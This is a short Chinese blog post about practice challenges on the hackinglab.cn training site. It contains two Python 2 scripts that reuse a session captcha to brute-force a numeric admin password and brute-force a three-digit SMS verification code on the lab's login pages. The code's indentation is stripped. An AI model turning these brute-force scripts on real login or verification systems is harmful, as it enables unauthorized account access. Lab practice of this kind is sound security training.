PYTHON POST练手

yinl_li

　　闲着无事跟着某同学在hackinglab.cn上做两道脚本题练手 就是模拟POST发包而已
　　
　　4-大致上是每次访问index.php相对应一个验证码,只要不重新访问这个页面,用同一个验证码即可。于是代码模拟访问这个页面，获取cookie,再暴力密码post
　　11-思路相近,查看源码推测是post到vcode.php对应一个验证码,所以暴力之前post到这个php一次　　
　　PS:需要暴力两个电话号码
　　



#!/bin/env python
import urllib, urllib2, cookielib
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response = urllib2.urlopen('http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php')
print response.read()
username="admin"
pwd=1
vcode=""
submit="submit"
vcode = raw_input()
data = {'username': username,
'pwd':  pwd,
'vcode': vcode,
'submit': submit,
}
for i in range(10000, 1000, -1):
data['pwd'] = i
f = urllib2.urlopen(
url = 'http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php',
data = urllib.urlencode(data),
)
if 'error' not in f.read():
print 'answer is %d' % i
break



#!/bin/env python
import urllib, urllib2, cookielib
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response = urllib2.urlopen('http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/#')
print response.read()
response = urllib2.urlopen(
url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php',
data = urllib.urlencode({'getcode':1, 'mobi':13399999999})
)
print response.read()
username="13399999999"
vcode=""
submit="submit"
data = {'username': username,
'vcode': vcode,
'Login': submit,
}
for i in range(100, 1000):
data['vcode'] = i
f = urllib2.urlopen(
url = 'http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php',
data = urllib.urlencode(data),
)
print f.read()
"""
if 'error' not in f.read():
print 'answer is %d' % i
break
"""